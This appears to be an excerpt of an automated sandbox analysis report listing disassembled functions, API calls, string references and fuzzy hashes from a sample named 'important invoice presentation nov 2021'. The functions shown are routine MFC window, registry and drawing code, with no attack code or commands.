Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c377d16fbe8f33d2931959dfff8d19ab50d85936efc4f9bc1996e649461761ae
Instruction ID: 996aa9d41273eff610aa5335e863d91d309b69a52fa5c704046f5c5b51b2fc27
Opcode Fuzzy Hash: c377d16fbe8f33d2931959dfff8d19ab50d85936efc4f9bc1996e649461761ae
Instruction Fuzzy Hash: 9F51B234A103489FCF10DF68C841AAE7BB4EF45325F188195EC19AB392D731EA59CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0EB8, Relevance: 10.6, APIs: 7, Instructions: 121windowthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB0E03: GetParent.USER32(4B5C1563), ref: 00BB0E63
Part of subcall function 00BB0E03: GetLastActivePopup.USER32(4B5C1563), ref: 00BB0E7D
Part of subcall function 00BB0E03: IsWindowEnabled.USER32(4B5C1563), ref: 00BB0E91
Part of subcall function 00BB0E03: EnableWindow.USER32(4B5C1563,00000000), ref: 00BB0EA4

EnableWindow.USER32(?,00000001), ref: 00BB0F03
GetWindowThreadProcessId.USER32(?,?), ref: 00BB0F19
GetCurrentProcessId.KERNEL32 ref: 00BB0F23
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 00BB0F39
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00BB0FC2
MessageBoxA.USER32 ref: 00BB0FE3
EnableWindow.USER32(00000000,00000001), ref: 00BB1008

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
String ID:
API String ID: 1924968399-0
Opcode ID: 4a63bbc7c4634defc5bcffb562a6dfd8bdeb1afb8bd3e90ad973d2ffe757a7ce
Instruction ID: 46f65bc94846d361867213471b78dadaa85f696c0b4cf7d16912627a13f79dbe
Opcode Fuzzy Hash: 4a63bbc7c4634defc5bcffb562a6dfd8bdeb1afb8bd3e90ad973d2ffe757a7ce
Instruction Fuzzy Hash: C6416C31A10219DFDB34AF28CC85BFAB7F8EB45740F0045E9E945E7290D6B09E808FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BFCD22, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

SHGetFileInfoA.SHELL32(?,00000000,?,00000160,?), ref: 00BFCD5F
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000208), ref: 00BFCDC2
__EH_prolog3.LIBCMT ref: 00BFCDFF

Part of subcall function 00BC96D2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00BC96EB

Part of subcall function 00C35211: __EH_prolog3.LIBCMT ref: 00C35218

Part of subcall function 00C352A0: __EH_prolog3.LIBCMT ref: 00C352A7
Part of subcall function 00C352A0: __fassign.LIBCMT ref: 00C353BA

Strings

MFCShellTreeCtrl_EnableShellContextMenu, xrefs: 00BFCE3E
TRUE, xrefs: 00BFCE63
???, xrefs: 00BFCDD7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$FileInfo$ByteCharMultiWide__fassign
String ID: ???$MFCShellTreeCtrl_EnableShellContextMenu$TRUE
API String ID: 1991860042-3649263699
Opcode ID: fb321db143b543bd060db6ce906c28f309f3f277aef6d4e76e54e96a8a53aa29
Instruction ID: c5c5c331c8aa1563d664f4c084ebfbd79cb27058f9c322946f7769574edc0098
Opcode Fuzzy Hash: fb321db143b543bd060db6ce906c28f309f3f277aef6d4e76e54e96a8a53aa29
Instruction Fuzzy Hash: 92415F30A1020E9BDB04EBA4CD46FFEBBF8EF15700F5045A9B515A71D1DB71AA48DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BEC31D, Relevance: 10.6, APIs: 7, Instructions: 116windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000407,00000000,?), ref: 00BEC35F
GetParent.USER32(?), ref: 00BEC383
SendMessageA.USER32(00000000,00000111,?,?), ref: 00BEC3B0
GetParent.USER32(?), ref: 00BEC3CF
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00BEC43D
GetParent.USER32(?), ref: 00BEC446
GetWindowLongA.USER32 ref: 00BEC45A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Parent$MessageSendWindow$LongRedraw
String ID:
API String ID: 4271267155-0
Opcode ID: 3c7e9db1dbd920934a4795b38828ce194499f9a43d5e0c9c78acfe6663e48201
Instruction ID: b1399bfbe1a92214f7c5e5290ee88a17155bdab10f6e167e53fca8762e194e8d
Opcode Fuzzy Hash: 3c7e9db1dbd920934a4795b38828ce194499f9a43d5e0c9c78acfe6663e48201
Instruction Fuzzy Hash: 0A31BE71200351EBDF255F66CD899BABFF8FF08711B0482A5E545972A2CBB0DC02CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BF0346, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF034D

Part of subcall function 00BC96D2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00BC96EB

Part of subcall function 00C35211: __EH_prolog3.LIBCMT ref: 00C35218

Part of subcall function 00C352A0: __EH_prolog3.LIBCMT ref: 00C352A7
Part of subcall function 00C352A0: __fassign.LIBCMT ref: 00C353BA

Strings

MFCLink_Url, xrefs: 00BF038C
MFCLink_UrlPrefix, xrefs: 00BF03B8
MFCLink_Tooltip, xrefs: 00BF0431
MFCLink_FullTextTooltip, xrefs: 00BF03E4
TRUE, xrefs: 00BF0408

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide__fassign
String ID: MFCLink_FullTextTooltip$MFCLink_Tooltip$MFCLink_Url$MFCLink_UrlPrefix$TRUE
API String ID: 1708987901-3373932565
Opcode ID: 4f19675fb8681880b915e92204c719aace203501ac131fe54dc08670ec2a541f
Instruction ID: e79f0c58ee382df28cc2f4545b7c689989ba37bb425f8c7d9a6ab8435a102911
Opcode Fuzzy Hash: 4f19675fb8681880b915e92204c719aace203501ac131fe54dc08670ec2a541f
Instruction Fuzzy Hash: 96413A74A1014E9ECF05EBA0CD96DFEBBB9EF54304F4400A9E91173192EF74AA09DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00BB028B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00BB0295
RegOpenKeyExA.ADVAPI32(?,00000010,00000000,0002001F,?,00000124), ref: 00BB033B

Part of subcall function 00BB01D5: __EH_prolog3.LIBCMT ref: 00BB01DC
Part of subcall function 00BB01D5: _strlen.LIBCMT ref: 00BB0215

RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00BB035F
RegCloseKey.ADVAPI32(?), ref: 00BB0414

Strings

Software\Classes\, xrefs: 00BB02E1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CloseEnumH_prolog3H_prolog3_catch_Open_strlen
String ID: Software\Classes\
API String ID: 1951977290-1121929649
Opcode ID: 3bdad638ae32664df85844ff3831f60c5476b80bdf3d628e5cd879da7af25b7f
Instruction ID: ab013381c9edfcf6bc9a1950bfa67b6ba662c703e8e221c732f8162d18e7bdde
Opcode Fuzzy Hash: 3bdad638ae32664df85844ff3831f60c5476b80bdf3d628e5cd879da7af25b7f
Instruction Fuzzy Hash: 97418072910218DBDB21EB64CD85BFEB7F4AF59310F1001D5E94AA3252DAB09E54CE21

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA94B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 00BBA976
GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 00BBA9AB
GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 00BBA9D3

Strings

user32.dll, xrefs: 00BBA96C
CloseTouchInputHandle, xrefs: 00BBA9C5
GetTouchInputInfo, xrefs: 00BBA99D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
API String ID: 667068680-1853737257
Opcode ID: 929d920889f2eb5cb9e845ac0b904efa992c16804cec7ddef11fe0bce79563a8
Instruction ID: 21aaa6ceec63b42dc1e51e31c9c77f049b18c7e9cfe30f0280371dfdbdf5019f
Opcode Fuzzy Hash: 929d920889f2eb5cb9e845ac0b904efa992c16804cec7ddef11fe0bce79563a8
Instruction Fuzzy Hash: 6231A835E04200DFDB145F2AED449BA7BE9EB4AB50715069DE842E7360DBF0DD05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BEAABC, Relevance: 10.6, APIs: 7, Instructions: 100windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BEAAD8
GetNextDlgGroupItem.USER32(?,00000000,00000000), ref: 00BEAAFB
GetNextDlgGroupItem.USER32(?,?,?), ref: 00BEAB58
SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 00BEAB86
GetWindowLongA.USER32 ref: 00BEAB99
GetParent.USER32(?), ref: 00BEABA8
SendMessageA.USER32(00000000,00000111,?,?), ref: 00BEABC5

Part of subcall function 00BBE901: GetWindowLongA.USER32 ref: 00BBE90E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: GroupItemLongMessageNextParentSendWindow
String ID:
API String ID: 4258059889-0
Opcode ID: 0ef4c0e3a89ef5e7bf6768be4099a0cb62c65107cc9ad448b7ac783903c7886a
Instruction ID: 05599d3320d5f7b244731c934a160d184ddd7049f899aff99f4b614a659931ed
Opcode Fuzzy Hash: 0ef4c0e3a89ef5e7bf6768be4099a0cb62c65107cc9ad448b7ac783903c7886a
Instruction Fuzzy Hash: 8A319272A00650EFDF21AFB59C84EAE7BEEFB48700F150AA9F546D7251EB35D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6836, Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE683D
GetDesktopWindow.USER32 ref: 00BE6883
GetWindow.USER32(00000000), ref: 00BE688A
IsWindowEnabled.USER32(00000000), ref: 00BE689A
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 00BE68C5
EnableWindow.USER32(00000000,00000000), ref: 00BE68D1
GetWindow.USER32(00000000,00000002), ref: 00BE68E6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$DesktopEnableEnabledH_prolog3MessageSend
String ID:
API String ID: 1052513496-0
Opcode ID: a4cc9655ff70b6faffc08e045dfa8bb5e3ef7684d884ce7cb1747634c793fbd1
Instruction ID: c7cdcdc58f65b94739879e5a14a7a27b85cdc2cd844e27f660c3c0f31e64266a
Opcode Fuzzy Hash: a4cc9655ff70b6faffc08e045dfa8bb5e3ef7684d884ce7cb1747634c793fbd1
Instruction Fuzzy Hash: 6331B2319016559BDB21AF728C0ABAE77E8EF59790F0441AAF905E6242EB34C9008B70

Uniqueness

Uniqueness Score: -1.00%

Function 00BF2B89, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF2B90

Part of subcall function 00BC96D2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00BC96EB

Part of subcall function 00C35211: __EH_prolog3.LIBCMT ref: 00C35218

Part of subcall function 00C36E2D: __EH_prolog3.LIBCMT ref: 00C36E34

Strings

MFCMenuButton_Autosize, xrefs: 00BF2C51
MFCMenuButton_DefaultClick, xrefs: 00BF2C2F
MFCMenuButton_StayPressed, xrefs: 00BF2C0D
MFCMenuButton_OSMenu, xrefs: 00BF2BC6
MFCMenuButton_RightArrow, xrefs: 00BF2BEB

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide
String ID: MFCMenuButton_Autosize$MFCMenuButton_DefaultClick$MFCMenuButton_OSMenu$MFCMenuButton_RightArrow$MFCMenuButton_StayPressed
API String ID: 2949695960-2044485435
Opcode ID: ec385cf8efd7f7ed05f6317463bd29015c31918ff9a4c78f88d9d08bdc7fd4ed
Instruction ID: 2c32a6d3ab3cbfae7a3c096a6d21b0f4b91da9efefc3526514787a3f69862106
Opcode Fuzzy Hash: ec385cf8efd7f7ed05f6317463bd29015c31918ff9a4c78f88d9d08bdc7fd4ed
Instruction Fuzzy Hash: 6A31EFB5D1021EAEDF05DFA4C9459EEBBB9FF08310F104466E915B3240DB349A09CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE8562, Relevance: 10.6, APIs: 7, Instructions: 87windowthreadCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 00BE8587
GetParent.USER32(?), ref: 00BE8598
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BE85B3
GetCurrentProcessId.KERNEL32 ref: 00BE85B9
GetActiveWindow.USER32 ref: 00BE8614
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 00BE8625
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00BE863F

Part of subcall function 00BBE314: EnableWindow.USER32(?,4B5C1563), ref: 00BBE325

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
String ID:
API String ID: 2169720751-0
Opcode ID: 4e86f1f3c504ff2cb53b406ec23e3219ee6d17d47a18aadd4f9ddbc82c95aebf
Instruction ID: 36e6cd3ba41004841c34504168662cfad4bac08c3a491bc1a47c4777fb8ff546
Opcode Fuzzy Hash: 4e86f1f3c504ff2cb53b406ec23e3219ee6d17d47a18aadd4f9ddbc82c95aebf
Instruction Fuzzy Hash: 94318B72600750EFDF219F55CC89B9D7BE5EF54710F1506A8E989AB2A1CFB06840CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BE821E, Relevance: 10.6, APIs: 7, Instructions: 85windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BE8225
UnpackDDElParam.USER32(000003E8,?,?,?), ref: 00BE825D
GlobalLock.KERNEL32 ref: 00BE8265
_strlen.LIBCMT ref: 00BE8286
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00BE8299
ReuseDDElParam.USER32 ref: 00BE82DC
PostMessageA.USER32(?,000003E4,?,00000000), ref: 00BE82E8

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: GlobalParam$H_prolog3_catchLockMessagePostReuseUnlockUnpack_strlen
String ID:
API String ID: 4274037074-0
Opcode ID: 410bc0771e807dc112b171447fc26b29a23eb44bf746ac8e75fc1fde8c1d63f5
Instruction ID: 98f7083e8d626cecd208cb24d76832ed5ad603305daba24149a4c827d6050596
Opcode Fuzzy Hash: 410bc0771e807dc112b171447fc26b29a23eb44bf746ac8e75fc1fde8c1d63f5
Instruction Fuzzy Hash: FC319A3090020AEFEF05EBA0C986ABEBBB5EF04315F1041A8F90677291DB709E04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C060C1, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00C060DA
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000001,?,00000001,00000003,4B5C1563,?,00000000,00E48480), ref: 00C06102
GetLastError.KERNEL32(?,00000000,00E48480), ref: 00C06113
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00E48480,00000000,00000000,?,00000000,00E48480), ref: 00C0612B
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00E48480,?,00000000,?,?,?,?,?,?,?,00000000,00E48480), ref: 00C06152

Strings

@Mxt, xrefs: 00C06113

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_strlen
String ID: @Mxt
API String ID: 1602738612-1922883433
Opcode ID: 697cc75d51db17d99ad1fc989da130a9f8c1523f78bb5f4be7c5017b4c264b90
Instruction ID: 32eb4ea7f2e59dc0ca7d9308a7c239b40d193c1280000b7962868c094f742076
Opcode Fuzzy Hash: 697cc75d51db17d99ad1fc989da130a9f8c1523f78bb5f4be7c5017b4c264b90
Instruction Fuzzy Hash: F111D2B1940219FFEB115F50DC85FBBBBACEF15395F148224F91496290E720AE24DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC836E, Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BC8397
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC83B3
MulDiv.KERNEL32(00000000), ref: 00BC83BA
DPtoLP.GDI32(00000000,?,00000001), ref: 00BC83CF
DPtoLP.GDI32(00000000,?,00000001), ref: 00BC83E2
ReleaseDC.USER32 ref: 00BC8402
CreateFontIndirectA.GDI32(?), ref: 00BC840C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e68ce4acf59aab3d6ba74124aaac5e8b935fc0e2c74d7d02ac5f85f2dac07879
Instruction ID: 41f86d93d1aadf19c99d7b9aaf59cbe9a31798e6694cba9fff44e8b50664ab42
Opcode Fuzzy Hash: e68ce4acf59aab3d6ba74124aaac5e8b935fc0e2c74d7d02ac5f85f2dac07879
Instruction Fuzzy Hash: A721E471900318EFDB10DFA4DC89AAEBBB8FB08711F10451AF506EB291DB74A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8E3A, Relevance: 10.6, APIs: 7, Instructions: 72windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BA8E41

Part of subcall function 00BC88F6: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00BC893D
Part of subcall function 00BC88F6: CreatePatternBrush.GDI32(00000000), ref: 00BC894A
Part of subcall function 00BC88F6: DeleteObject.GDI32(00000000), ref: 00BC8956

GetClientRect.USER32 ref: 00BA8E6E
CreateRectRgnIndirect.GDI32(?), ref: 00BA8E85
GetDC.USER32(?), ref: 00BA8E97

Part of subcall function 00BB4456: SelectClipRgn.GDI32(000000FF,00000000), ref: 00BB4476
Part of subcall function 00BB4456: SelectClipRgn.GDI32(000000FF,00000000), ref: 00BB448C

SendMessageA.USER32(?,00000198,000000FF,?), ref: 00BA8EBF

Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB457B
Part of subcall function 00BB455B: SelectObject.GDI32(?,00000000), ref: 00BB4591

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00BA8EFA
ReleaseDC.USER32 ref: 00BA8F0E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

